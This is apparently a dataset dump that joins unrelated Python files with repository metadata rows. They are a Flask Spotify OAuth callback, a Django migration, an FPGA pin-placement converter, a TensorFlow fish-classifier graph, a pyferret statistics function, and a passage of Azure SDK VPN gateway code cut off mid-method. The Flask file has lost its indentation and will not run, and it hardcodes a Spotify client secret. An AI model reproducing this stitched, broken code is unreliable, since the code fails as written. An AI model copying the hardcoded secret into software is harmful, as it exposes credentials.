|
7a88eac7ad60745b750346474ff34a5b67c09191
|
[
"MIT"
] | null | null | null |
gestifyApi/api.py
|
canardaaydin/Hand-Gesture-Control-for-Spotify
|
7a88eac7ad60745b750346474ff34a5b67c09191
|
[
"MIT"
] | 1 |
2021-11-23T16:18:01.000Z
|
2021-11-23T16:18:01.000Z
|
from flask import Flask, render_template, make_response
from flask_restful import Resource, Api, request
import pprint
import requests
import base64
import spotipy
import spotipy.util as util
import json
app = Flask(__name__)
api = Api(app)
client_id = "d81ae7685f0240df9fc3e88c7698bc53"
secret_id = "439c9f6110554b16b95ae8add377da8a"
redirect_uri = "http://barda.life"
endpoint = "https://accounts.spotify.com/api/token"
auth_code = ""
def getPersonalInfo(token):
headers = {
"Accept": "application/json",
"Content-Type" : "application/json",
'Authorization': 'Bearer {0}'.format(token)
}
r = requests.get("https://api.spotify.com/v1/me", headers=headers)
response_data = json.loads(r.text)
return response_data
class get_auth_code(Resource):
def get(self):
auth_code = request.args.get('code')
auth_str = bytes('{}:{}'.format(client_id, secret_id), 'utf-8')
b64_auth_str = base64.b64encode(auth_str).decode('utf-8')
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic {}'.format(b64_auth_str)
}
code_payload = {
'grant_type': 'authorization_code',
'code': str(auth_code),
'redirect_uri': redirect_uri,
}
post_request = requests.post('https://accounts.spotify.com/api/token', data=code_payload, headers=headers)
response_data = json.loads(post_request.text)
#print(response_data)
access_token = response_data.get('access_token')
refresh_token = response_data.get('refresh_token')
personal_data = getPersonalInfo(access_token)
user_full_name = personal_data.get('display_name')
name = user_full_name.split()[0]
#print(name)
headers = {'Content-Type': 'text/html'}
return make_response(render_template('index.html', name=name), 200,headers)
api.add_resource(get_auth_code, '/')
if __name__ == '__main__':
app.run(port=5000, host='0.0.0.0')
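
# Hedged illustration (not part of the API): builds the Spotify authorize URL a
# user would visit so that Spotify redirects back with the ?code= parameter the
# resource above exchanges for tokens. The scope value is an assumption for the
# example; client_id and redirect_uri come from the module constants.
def _example_authorize_url(scope="user-read-private"):
    from urllib.parse import urlencode

    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": scope,
    }
    return "https://accounts.spotify.com/authorize?" + urlencode(params)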
| 23.197531 | 108 | 0.723789 |
898014b2091b7e026bfe9dfaf15324a72ffbbf12
| 437 |
py
|
Python
|
blogapp/migrations/0006_auto_20210314_1244.py
|
NitinPSingh/blogprojlive
|
769685f22218d31b8eb2195d65d9c3c351e02772
|
[
"MIT"
] | 1 |
2021-04-06T15:10:09.000Z
|
2021-04-06T15:10:09.000Z
|
blogapp/migrations/0006_auto_20210314_1244.py
|
NitinPSingh/blogprojlive
|
769685f22218d31b8eb2195d65d9c3c351e02772
|
[
"MIT"
] | null | null | null |
blogapp/migrations/0006_auto_20210314_1244.py
|
NitinPSingh/blogprojlive
|
769685f22218d31b8eb2195d65d9c3c351e02772
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-03-14 07:14
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0005_auto_20210313_1746'),
]
operations = [
migrations.AlterField(
model_name='post',
name='body',
field=ckeditor.fields.RichTextField(blank=True, null=True),
),
]
| 21.85 | 72 | 0.590389 |
a04d0be6882ed93317904bd864c617462ff3f5d8
| 5,852 |
py
|
Python
|
quicklogic/common/utils/create_ioplace.py
|
bl0x/symbiflow-arch-defs
|
5fa5e71526e443d589971f2649d8b189df982d72
|
[
"ISC"
] | 183 |
2017-12-29T12:08:32.000Z
|
2022-02-15T03:29:07.000Z
|
quicklogic/common/utils/create_ioplace.py
|
bl0x/symbiflow-arch-defs
|
5fa5e71526e443d589971f2649d8b189df982d72
|
[
"ISC"
] | 1,832 |
2017-12-29T14:47:27.000Z
|
2022-02-18T06:30:43.000Z
|
quicklogic/common/utils/create_ioplace.py
|
bl0x/symbiflow-arch-defs
|
5fa5e71526e443d589971f2649d8b189df982d72
|
[
"ISC"
] | 96 |
2017-12-30T12:00:45.000Z
|
2022-02-17T09:03:46.000Z
|
#!/usr/bin/env python3
"""
Convert a PCF file into a VPR io.place file.
"""
import argparse
import csv
import sys
import re
from collections import defaultdict
import vpr_io_place
from pinmap_parse import read_pinmapfile_data
from pinmap_parse import vec_to_scalar
from lib.parse_pcf import parse_simple_pcf
# =============================================================================
BLOCK_INSTANCE_RE = re.compile(r"^(?P<name>\S+)\[(?P<index>[0-9]+)\]$")
# =============================================================================
def gen_io_def(args):
'''
Generate io.place file from pcf file
'''
io_place = vpr_io_place.IoPlace()
io_place.read_io_list_from_eblif(args.blif)
io_place.load_block_names_from_net_file(args.net)
# Load all the necessary data from the pinmap_xml
io_cells, port_map = read_pinmapfile_data(args.pinmap_xml)
# Map of pad names to VPR locations.
pad_map = defaultdict(lambda: dict())
with open(args.csv_file, mode='r') as csv_fp:
reader = csv.DictReader(csv_fp)
for line in reader:
port_name_list = vec_to_scalar(line['port_name'])
pin_name = vec_to_scalar(line['mapped_pin'])
gpio_type = line['GPIO_type']
if len(port_name_list) != len(pin_name):
print(
'CSV port name "{}" length does not match with mapped pin name "{}" length'
.format(line['port_name'], line['mapped_pin']),
file=sys.stderr
)
sys.exit(1)
for port, pin in zip(port_name_list, pin_name):
if port in port_map:
curr_map = port_map[port]
if gpio_type is None or gpio_type == '':
pad_map[pin] = (
int(curr_map.x), int(curr_map.y), int(curr_map.z)
)
else:
gpio_pin = pin + ":" + gpio_type.strip()
pad_map[gpio_pin] = (
int(curr_map.x), int(curr_map.y), int(curr_map.z)
)
else:
print(
'Port name "{}" specified in csv file "{}" is invalid. {} "{}"'
.format(
line['port_name'], args.csv_file,
"Specify from port names in xml file",
args.pinmap_xml
),
file=sys.stderr
)
sys.exit(1)
for pcf_constraint in parse_simple_pcf(args.pcf):
if (type(pcf_constraint).__name__ == 'PcfIoConstraint'):
pad_name = pcf_constraint.pad
if not io_place.is_net(pcf_constraint.net):
print(
'PCF constraint "{}" from line {} constraints net {} {}:\n{}'
.format(
pcf_constraint.line_str, pcf_constraint.line_num,
pcf_constraint.net, '\n'.join(io_place.get_nets()),
"which is not in available netlist"
),
file=sys.stderr
)
sys.exit(1)
if pad_name not in pad_map:
print(
'PCF constraint "{}" from line {} constraints pad {} {}:\n{}'
.format(
pcf_constraint.line_str, pcf_constraint.line_num,
pad_name, '\n'.join(sorted(pad_map.keys())),
"which is not in available pad map"
),
file=sys.stderr
)
sys.exit(1)
# Get the top-level block instance, strip its index
inst = io_place.get_top_level_block_instance_for_net(
pcf_constraint.net
)
if inst is None:
continue
match = BLOCK_INSTANCE_RE.match(inst)
assert match is not None, inst
inst = match.group("name")
# Constraint the net (block)
locs = pad_map[pad_name]
io_place.constrain_net(
net_name=pcf_constraint.net,
loc=locs,
comment=pcf_constraint.line_str
)
if io_place.constraints:
io_place.output_io_place(args.output)
# =============================================================================
def main():
'''
Convert a PCF file into a VPR io.place file
'''
parser = argparse.ArgumentParser(
description='Convert a PCF file into a VPR io.place file.'
)
parser.add_argument(
"--pcf",
"-p",
"-P",
type=argparse.FileType('r'),
required=True,
help='PCF input file'
)
parser.add_argument(
"--blif",
"-b",
type=argparse.FileType('r'),
required=True,
help='BLIF / eBLIF file'
)
parser.add_argument(
"--output",
"-o",
"-O",
type=argparse.FileType('w'),
default=sys.stdout,
help='The output io.place file'
)
parser.add_argument(
"--net",
"-n",
type=argparse.FileType('r'),
required=True,
help='top.net file'
)
parser.add_argument(
"--pinmap_xml",
type=str,
required=True,
help="Input pin-mapping xml file"
)
parser.add_argument(
"--csv_file",
type=str,
required=True,
help="Input user-defined pinmap CSV file"
)
args = parser.parse_args()
gen_io_def(args)
# =============================================================================
if __name__ == '__main__':
main()
| 30.8 | 95 | 0.476247 |
f9f7407df96d1761893906b874aa470ae813ff10
| 12,220 |
py
|
Python
|
FishyFish/FishyFish_GRAPH.py
|
CCThompson82/Kaggle_FF3
|
a8d68a8e33b213470d2b26d2115c6a5ac989af8d
|
[
"MIT"
] | null | null | null |
FishyFish/FishyFish_GRAPH.py
|
CCThompson82/Kaggle_FF3
|
a8d68a8e33b213470d2b26d2115c6a5ac989af8d
|
[
"MIT"
] | null | null | null |
FishyFish/FishyFish_GRAPH.py
|
CCThompson82/Kaggle_FF3
|
a8d68a8e33b213470d2b26d2115c6a5ac989af8d
|
[
"MIT"
] | null | null | null |
"""This script is the FishFinder graph for the Kaggle Nature Conservancy Fishery
Competition. It utilizes VGG-19 model as pre-trained weights during the
convolution steps"""
fishyfish = tf.Graph()
with fishyfish.as_default() :
# Variables
with tf.variable_scope('Variables') :
with tf.variable_scope('Convolutions') :
with tf.name_scope('Convolution_1') :
W_conv1 = tf.Variable(np.load(pretrained_path+'W_conv_1.npy'), trainable = False)
b_conv1 = tf.Variable(np.load(pretrained_path+'b_conv_1.npy'), trainable = False)
tf.summary.histogram('W_conv1', W_conv1)
tf.summary.histogram('b_conv1', b_conv1)
with tf.name_scope('Convolution_2') :
W_conv2 = tf.Variable(np.load(pretrained_path+'W_conv_2.npy'), trainable = False)
b_conv2 = tf.Variable(np.load(pretrained_path+'b_conv_2.npy'), trainable = False)
tf.summary.histogram('W_conv2', W_conv2)
tf.summary.histogram('b_conv2', b_conv2)
with tf.name_scope('Convolution_3') :
W_conv3 = tf.Variable(np.load(pretrained_path+'W_conv_3.npy'), trainable = False)
b_conv3 = tf.Variable(np.load(pretrained_path+'b_conv_3.npy'), trainable = False)
tf.summary.histogram('W_conv3', W_conv3)
tf.summary.histogram('b_conv3', b_conv3)
with tf.name_scope('Convolution_4') :
W_conv4 = tf.Variable(np.load(pretrained_path+'W_conv_4.npy'), trainable = False)
b_conv4 = tf.Variable(np.load(pretrained_path+'b_conv_4.npy'), trainable = False)
tf.summary.histogram('W_conv4', W_conv4)
tf.summary.histogram('b_conv4', b_conv4)
with tf.name_scope('Convolution_5') :
W_conv5 = tf.Variable(np.load(pretrained_path+'W_conv_5.npy'), trainable = False)
b_conv5 = tf.Variable(np.load(pretrained_path+'b_conv_5.npy'), trainable = False)
tf.summary.histogram('W_conv5', W_conv5)
tf.summary.histogram('b_conv5', b_conv5)
with tf.name_scope('Convolution_6') :
W_conv6 = tf.Variable(np.load(pretrained_path+'W_conv_6.npy'), trainable = False)
b_conv6 = tf.Variable(np.load(pretrained_path+'b_conv_6.npy'), trainable = False)
tf.summary.histogram('W_conv6', W_conv6)
tf.summary.histogram('b_conv6', b_conv6)
with tf.variable_scope('Dense_layers') :
with tf.name_scope('dense_1') :
W_fc1 = tf.Variable(tf.truncated_normal([nodes_after_conv, fc_depth[0]], stddev = stddev ))
b_fc1 = tf.Variable(tf.zeros([fc_depth[0]]))
tf.summary.histogram('W_fc1', W_fc1)
tf.summary.histogram('b_fc1', b_fc1)
with tf.name_scope('dense_2') :
W_fc2 = tf.Variable(tf.truncated_normal([fc_depth[0], fc_depth[1]], stddev = stddev ))
b_fc2 = tf.Variable(tf.zeros([fc_depth[1]]))
tf.summary.histogram('W_fc2', W_fc2)
tf.summary.histogram('b_fc2', b_fc2)
with tf.name_scope('dense_3') :
W_fc3 = tf.Variable(tf.truncated_normal([fc_depth[1], fc_depth[2]], stddev = stddev ))
b_fc3 = tf.Variable(tf.zeros([fc_depth[2]]))
tf.summary.histogram('W_fc3', W_fc3)
tf.summary.histogram('b_fc3', b_fc3)
with tf.name_scope('dense_4') :
W_fc4 = tf.Variable(tf.truncated_normal([(fc_depth[2]+32+1), fc_depth[3]], stddev = stddev ))
b_fc4 = tf.Variable(tf.zeros([fc_depth[3]]))
tf.summary.histogram('W_fc4', W_fc4)
tf.summary.histogram('b_fc4', b_fc4)
with tf.variable_scope('Classifiers') :
with tf.name_scope('FishNoF') :
W_clf = tf.Variable(tf.truncated_normal([fc_depth[3],num_labels], stddev = stddev))
b_clf = tf.Variable(tf.zeros([num_labels]))
tf.summary.histogram('W_clf', W_clf)
tf.summary.histogram('b_clf', b_clf)
def convolutions(data) :
"""
Emulates VGG-19 architecture.
"""
with tf.name_scope('Convolution') :
conv_layer = tf.nn.relu(
tf.nn.conv2d(data, filter = W_conv1,
strides = [1, 2, 2, 1],
padding = 'SAME') + b_conv1)
conv_layer = tf.nn.max_pool(
tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv2,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv2),
ksize = [1, pool_kernel, pool_kernel,1],
strides = [1, pool_stride, pool_stride, 1],
padding ='VALID')
conv_layer = tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv3,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv3)
conv_layer = tf.nn.max_pool(
tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv4,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv4),
ksize = [1, pool_kernel, pool_kernel,1],
strides = [1, pool_stride, pool_stride, 1],
padding ='VALID')
conv_layer = tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv5,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv5)
conv_layer = tf.nn.max_pool(tf.nn.relu(
tf.nn.conv2d(conv_layer, filter = W_conv6,
strides = [1, conv_stride, conv_stride, 1],
padding = 'SAME') + b_conv6),
ksize = [1, pool_kernel, pool_kernel,1],
strides = [1, pool_stride, pool_stride, 1],
padding ='VALID')
return conv_layer
def dense_layers(data, embedding, FiNoF, keep_prob) :
"""
Executes a series of dense layers.
"""
def fc(data, W, b, keep_prob = keep_prob) :
"""Convenience function for dense layer with dropout"""
fc = tf.nn.dropout(
tf.nn.tanh(
tf.matmul(data, W) + b,
),
keep_prob)
return fc
fc_layer = fc(data, W_fc1, b_fc1, keep_prob[0])
fc_layer = fc(fc_layer, W_fc2, b_fc2, keep_prob[1])
fc_layer = fc(fc_layer, W_fc3, b_fc3, keep_prob[2])
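        # Added comment: the fc3 output is concatenated with the 32-dim image
        # embedding and the scalar fish probability, which is why W_fc4 above
        # has an input size of (fc_depth[2] + 32 + 1).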
        fc_layer = tf.concat([fc_layer, embedding, FiNoF], axis=1)
print(fc_layer)
fc_layer = fc(fc_layer, W_fc4, b_fc4, keep_prob[3])
return fc_layer
with tf.name_scope('Training') :
with tf.name_scope('Input') :
fovea = tf.placeholder(tf.float32, shape = [batch_size, 64, 64, num_channels])
embedding = tf.placeholder(tf.float32, shape = [batch_size, 32])
fish_prob = tf.placeholder(tf.float32, shape = [batch_size, 1])
labels = tf.placeholder(tf.float32, shape = [batch_size,num_labels])
fovea_weights = tf.placeholder(tf.float32, shape = [batch_size, 1])
label_weights = tf.placeholder(tf.float32, shape = [batch_size, 1])
gamma_fovea = tf.placeholder(tf.float32, shape = ())
gamma_label = tf.placeholder(tf.float32, shape = ())
learning_rate = tf.placeholder(tf.float32, shape = () )
beta_regularizer = tf.placeholder(tf.float32, shape = ())
with tf.name_scope('Network') :
conv_output = convolutions(fovea)
dense_input = tf.contrib.layers.flatten(conv_output)
dense_output = dense_layers(dense_input, embedding, fish_prob, keep_prob = keep_prob)
with tf.name_scope('Classifiers') :
logits = tf.matmul(dense_output, W_clf) + b_clf
        with tf.name_scope('Backpropagation') :
xent = tf.nn.softmax_cross_entropy_with_logits(
logits = logits, labels = labels)
fovea_cost = gamma_fovea*tf.reduce_mean(tf.multiply(xent, fovea_weights))
label_cost = gamma_label*tf.reduce_mean(tf.multiply(xent, label_weights))
regularization_term = (tf.nn.l2_loss(W_fc4) +
tf.nn.l2_loss(W_fc3) +
tf.nn.l2_loss(W_fc2) +
tf.nn.l2_loss(W_fc1)
) * beta_regularizer
cost = tf.reduce_mean(xent) + fovea_cost + label_cost + regularization_term
train_op = tf.train.AdagradOptimizer(learning_rate).minimize(cost)
with tf.name_scope('Validation') :
with tf.name_scope('Input') :
val_fovea = tf.placeholder(tf.float32, shape = [valid_size, 64, 64, num_channels])
val_embedding = tf.placeholder(tf.float32, shape = [valid_size, 32])
val_fish_prob = tf.placeholder(tf.float32, shape = [valid_size, 1])
val_labels = tf.placeholder(tf.float32, shape = [valid_size, num_labels])
with tf.name_scope('Network') :
v_conv_output = convolutions(val_fovea)
v_dense_input = tf.contrib.layers.flatten(v_conv_output)
v_dense_output = dense_layers(v_dense_input, val_embedding, val_fish_prob, keep_prob = [1.0, 1.0, 1.0, 1.0])
with tf.name_scope('Classifiers') :
val_logits = tf.matmul(v_dense_output, W_clf) + b_clf
with tf.name_scope('Metrics') :
val_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits = val_logits, labels = val_labels))
val_acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(val_logits, 1), tf.argmax(val_labels, 1)), dtype = tf.float32))
with tf.name_scope('Summaries') :
with tf.name_scope('Valid_Set') :
tf.summary.scalar('Accuracy_FiNoF', val_acc)
tf.summary.scalar('CrossEntropy', val_loss)
with tf.name_scope('Parameters') :
tf.summary.scalar('LearningRate', learning_rate)
tf.summary.scalar('Regularization_Coefficient', beta_regularizer)
tf.summary.scalar('Fovea_Cost_Coefficient', gamma_fovea)
tf.summary.scalar('Label_Cost_Coefficient', gamma_label)
with tf.name_scope('Train_Set') :
tf.summary.scalar('NaiveCrossEntropy', tf.reduce_mean(xent))
tf.summary.scalar('Regularization', regularization_term)
tf.summary.scalar('Fovea_cost', fovea_cost)
tf.summary.scalar('Label_cost', label_cost)
tf.summary.scalar("Cost", cost)
summaries = tf.summary.merge_all()
with tf.name_scope('Prediction') :
with tf.name_scope('Input') :
test_fovea = tf.placeholder(tf.float32, shape = [None, 64, 64, num_channels])
test_embedding = tf.placeholder(tf.float32, shape = [None, 32])
test_fish_prob = tf.placeholder(tf.float32, shape = [None, 1])
with tf.name_scope('Network') :
t_conv_output = convolutions(test_fovea)
t_dense_input = tf.contrib.layers.flatten(t_conv_output)
t_dense_output = dense_layers(t_dense_input, test_embedding, test_fish_prob, keep_prob = [1.0, 1.0, 1.0, 1.0])
with tf.name_scope('Classifiers') :
test_logits = tf.matmul(t_dense_output, W_clf) + b_clf
test_predictions = tf.nn.softmax(test_logits)
| 54.070796 | 127 | 0.556383 |
4cab16270ad0c783b99089bbeb7793fe05e39245
| 3,523 |
py
|
Python
|
pyfermod/stats/stats_isf.py
|
josborne-noaa/PyFerret
|
8496508e9902c0184898522e9f89f6caea6d4539
|
[
"Unlicense"
] | 44 |
2016-03-18T22:05:31.000Z
|
2021-12-23T01:50:09.000Z
|
pyfermod/stats/stats_isf.py
|
josborne-noaa/PyFerret
|
8496508e9902c0184898522e9f89f6caea6d4539
|
[
"Unlicense"
] | 88 |
2016-08-19T08:05:37.000Z
|
2022-03-28T23:29:21.000Z
|
pyfermod/stats/stats_isf.py
|
josborne-noaa/PyFerret
|
8496508e9902c0184898522e9f89f6caea6d4539
|
[
"Unlicense"
] | 24 |
2016-02-07T18:12:06.000Z
|
2022-02-19T09:06:17.000Z
|
"""
Returns the array of inverse survival function values for
a probability distribution and set of quantile values.
"""
from __future__ import print_function
import numpy
import scipy.stats
import pyferret
import pyferret.stats
def ferret_init(id):
"""
Initialization for the stats_isf python-backed ferret external function
"""
axes_values = [ pyferret.AXIS_IMPLIED_BY_ARGS ] * pyferret.MAX_FERRET_NDIM
true_influences = [ True ] * pyferret.MAX_FERRET_NDIM
false_influences = [ False ] * pyferret.MAX_FERRET_NDIM
retdict = { "numargs": 3,
"descript": "Returns inverse survival function values for a probability distribution",
"axes": axes_values,
"argnames": ("PROBS", "PDNAME", "PDPARAMS"),
"argdescripts": ("Probabilities (0-1) at which to calculate the inverse survival function values",
"Name of a probability distribution",
"Parameters for this probability distribution"),
"argtypes": (pyferret.FLOAT_ARRAY, pyferret.STRING_ONEVAL, pyferret.FLOAT_ARRAY),
"influences": (true_influences, false_influences, false_influences),
}
return retdict
def ferret_compute(id, result, resbdf, inputs, inpbdfs):
"""
Assigns result with the inverse survival function values for the probability
distribution indicated by inputs[1] (a string) using the parameters given in
inputs[2] at the quantile values given by inputs[0]. For undefined quantile
values, the result value will be undefined.
"""
distribname = inputs[1]
distribparams = inputs[2].reshape(-1)
distrib = pyferret.stats.getdistrib(distribname, distribparams)
badmask = ( numpy.fabs(inputs[0] - inpbdfs[0]) < 1.0E-5 )
badmask = numpy.logical_or(badmask, numpy.isnan(inputs[0]))
goodmask = numpy.logical_not(badmask)
result[badmask] = resbdf
# array[goodmask] is a flattened array
result[goodmask] = distrib.isf(inputs[0][goodmask])
#
# The rest of this is just for testing this module at the command line
#
if __name__ == "__main__":
# make sure ferret_init does not have problems
info = ferret_init(0)
# Normal distribution along the Y axis
dimen = 25
mu = 5.0
sigma = 2.0
distf = scipy.stats.norm(mu, sigma)
qvals = numpy.linspace(0.05, 0.95, dimen)
isfvals = distf.isf(qvals)
pfname = "norm"
pfparams = numpy.array([mu, sigma], dtype=numpy.float64)
inpbdfs = numpy.array([-1.0, 0.0, 0.0], dtype=numpy.float64)
resbdf = numpy.array([-2.0], dtype=numpy.float64)
quantile = numpy.empty((1, dimen, 1, 1, 1, 1), dtype=numpy.float64, order='F')
expected = numpy.empty((1, dimen, 1, 1, 1, 1), dtype=numpy.float64, order='F')
for j in range(dimen):
if (j % 7) == 3:
quantile[0, j, 0, 0, 0, 0] = inpbdfs[0]
expected[0, j, 0, 0, 0, 0] = resbdf[0]
else:
quantile[0, j, 0, 0, 0, 0] = qvals[j]
expected[0, j, 0, 0, 0, 0] = isfvals[j]
result = -888.0 * numpy.ones((1, dimen, 1, 1, 1, 1), dtype=numpy.float64, order='F')
ferret_compute(0, result, resbdf, (quantile, pfname, pfparams), inpbdfs)
if not numpy.allclose(result, expected):
print("Expected (flattened) = %s" % str(expected.reshape(-1)))
print("Result (flattened) = %s" % str(result.reshape(-1)))
raise ValueError("Unexpected result")
# All successful
print("Success")
| 39.144444 | 114 | 0.641783 |
f38a0d411433e6658439691eb6e6a2894b90f025
| 48,564 |
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_vpn_gateways_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2 |
2021-03-24T06:26:11.000Z
|
2021-04-18T15:55:59.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_vpn_gateways_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 4 |
2019-04-17T17:57:49.000Z
|
2020-04-24T21:11:22.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_vpn_gateways_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2 |
2021-05-23T16:46:31.000Z
|
2021-05-26T23:51:09.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VpnGatewaysOperations:
"""VpnGatewaysOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> "_models.VpnGateway":
"""Retrieves the details of a virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VpnGateway, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_06_01.models.VpnGateway
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.VpnGateway",
**kwargs
) -> "_models.VpnGateway":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vpn_gateway_parameters, 'VpnGateway')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.VpnGateway",
**kwargs
) -> AsyncLROPoller["_models.VpnGateway"]:
"""Creates a virtual wan vpn gateway if it doesn't exist else updates the existing gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
        :param vpn_gateway_parameters: Parameters supplied to create or update a virtual wan vpn
         gateway.
:type vpn_gateway_parameters: ~azure.mgmt.network.v2020_06_01.models.VpnGateway
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
vpn_gateway_parameters=vpn_gateway_parameters,
